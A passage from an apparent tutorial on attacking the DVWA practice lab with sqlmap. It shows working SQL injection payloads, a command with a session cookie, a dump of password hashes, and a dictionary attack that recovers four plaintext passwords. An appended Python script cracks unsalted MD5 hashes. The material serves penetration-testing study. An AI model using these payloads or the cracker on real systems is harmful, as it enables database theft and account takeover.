    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit
---
[00:44:35] [INFO] manual usage of GET payloads requires url encoding
[00:44:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[00:44:35] [INFO] fetching columns for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user       | varchar(15) |
| user_id    | int(6)      |
+------------+-------------+

[00:44:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 01:46:53
Dumping the password column. sqlmap recognises the values as MD5 hashes and offers a dictionary attack; with its bundled wordlist and common suffixes all four DVWA passwords are recovered and printed next to their hashes:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa -T users -C password --dump

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 01:46:53

[01:46:53] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:46:53] [INFO] resuming injection data from session file
[01:46:53] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[01:46:53] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit
---
[01:46:53] [INFO] manual usage of GET payloads requires url encoding
[01:46:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[01:46:54] [INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'
[01:46:54] [INFO] fetching column(s) 'password' entries for table 'users' on database 'dvwa'
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[01:46:55] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[01:46:58] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[01:46:58] [INFO] starting dictionary attack (md5_generic_passwd)
[01:46:58] [INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'
[01:46:58] [INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'
[01:46:58] [INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'
[01:46:58] [INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'
Database: dvwa
Table: users
[4 entries]
+---------------------------------------------+
| password                                    |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| e99a18c428cb38d5f260853678922e03 (abc123)   |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------------------------------------------+

[01:46:58] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[01:46:58] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
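The dictionary attack sqlmap ran as 'md5_generic_passwd', as an added example that is not part of the original post and not sqlmap's own code. The four hashes are the ones in the dump above; the wordlist and the suffix list are constructed here (sqlmap used its own txt/wordlist.txt and its built-in suffix set). DVWA stores unsalted MD5, so every candidate costs one digest that is checked against all hashes at once, which is why the whole attack finishes within the same second in the log.

```python
import hashlib
from typing import Dict, Iterable, List, Optional

# The four hashes from the dump above.
DUMPED_HASHES = [
    "0d107d09f5bbe40cade3de5c71e9e9b7",
    "8d3533d75ae2c3966d7e0d4fcc69216b",
    "e99a18c428cb38d5f260853678922e03",
    "5f4dcc3b5aa765d61d8327deb882cf99",
]

# Constructed wordlist standing in for sqlmap's txt/wordlist.txt. 'abc123' is
# deliberately absent so that it can only be found as 'abc' + suffix '123'.
WORDLIST = ["123456", "password", "letmein", "charley", "abc", "qwerty", "admin"]
# Stand-in for the 'common password suffixes' option; '' keeps the bare word.
SUFFIXES = ["", "1", "123", "!", "2011"]


def md5_hex(word: str) -> str:
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def crack(hashes: Iterable[str], words: Iterable[str],
          suffixes: Iterable[str] = ("",)) -> Dict[str, Optional[str]]:
    """Map every hash to the candidate that produced it, or None if the
    wordlist is exhausted. Unsalted MD5 means one digest per candidate is
    compared against all hashes at once; a salted or slow hash (bcrypt,
    scrypt, Argon2) would force one computation per hash per candidate."""
    found: Dict[str, Optional[str]] = {h.lower(): None for h in hashes}
    remaining = set(found)
    suffixes = list(suffixes)
    for word in words:
        for sfx in suffixes:
            if not remaining:
                return found
            candidate = word + sfx
            digest = md5_hex(candidate)
            if digest in remaining:
                found[digest] = candidate
                remaining.discard(digest)
    return found


def annotate(hashes: Iterable[str], found: Dict[str, Optional[str]]) -> List[str]:
    """Render rows the way the dump prints them: 'hash (plaintext)'."""
    return [f"{h} ({found[h.lower()]})" if found.get(h.lower()) else h
            for h in hashes]


if __name__ == "__main__":
    result = crack(DUMPED_HASHES, WORDLIST, SUFFIXES)
    for row in annotate(DUMPED_HASHES, result):
        print(row)
```

Without the suffix pass, 'abc123' stays uncracked in this wordlist; with it the attack multiplies the candidate count by the number of suffixes, which is what sqlmap's "(slow!)" warning refers to.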
Comments:

Nice article, so I want to learn from you, can I?

Because I'm just learning and do not quite understand, what if we learn together?

Do you agree?